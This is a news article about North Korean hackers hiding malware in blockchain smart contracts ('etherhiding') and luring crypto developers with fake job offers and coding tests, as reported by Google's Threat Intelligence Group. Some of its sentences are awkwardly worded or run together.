North Korean hackers embedded sophisticated code that was exploited in smart contracts
North Korean hackers have adopted a method of deploying malware designed to steal crypto and sensitive information by embedding malicious code into smart contracts on public blockchain networks, according to Google’s Threat Intelligence Group.
The technique, called “etherhiding,” appeared in 2023 and is commonly used in conjunction with Social engineering techniquessuch as reaching victims with fake job offers and high-profile interviews, directing users to malicious websites or links, according to Google.
Hackers take control of a legitimate website address through a loader script and embed JavaScript code into the website, which triggers a separate malicious code package in a smart contract designed to steal funds and data as soon as the user interacts with the compromised site.
The compromised website would communicate with the blockchain network using a “read-only” function that doesn’t actually create a transaction in the ledger, allowing threat actors to avoid detection and reduce transaction fees, Google researchers said.
The report highlighted the need for vigilance in the crypto community Keep users safe from scams and hacks threats are usually employed by attempted actors steal funds and valuable information from individuals and organizations alike.
Related: CZ’s Google account targeted by government ‘backed’ hackers
Know the Signs: North Korea Social Engineering campaign decoded
Actor threats are Set up fake companiesrecruitment and profiling agencies to target software and cryptocurrency developers fake job offeraccording to Google.
After the initial pitch, the attackers move the communication to messaging platforms like Discord or Telegram and direct the victim to take an employment test or complete a coding task.
“The main attack occurs during a technical assessment phase,” says Google Threat Intelligence. At this stage, the victim is usually told to download malicious files from online code repositories such as GitHub, where the malicious payload is stored.
At other times, the attackers lure the victim into a video callwhere a fake error message is shown to the user, prompting them to download a patch to fix the error. This software patch also contains malicious code.
Once the malicious software is installed on a machine, a javascript-based second stage called “Jadesnow” is deployed to steal sensitive data.
A third stage is sometimes deployed for high-value targets, allowing attackers long-term access to a compromised machine and other systems connected to its network, Google warned.
Magazine: Inside 30,000 Phone Bot Farm stealing crypto airdrops from real users
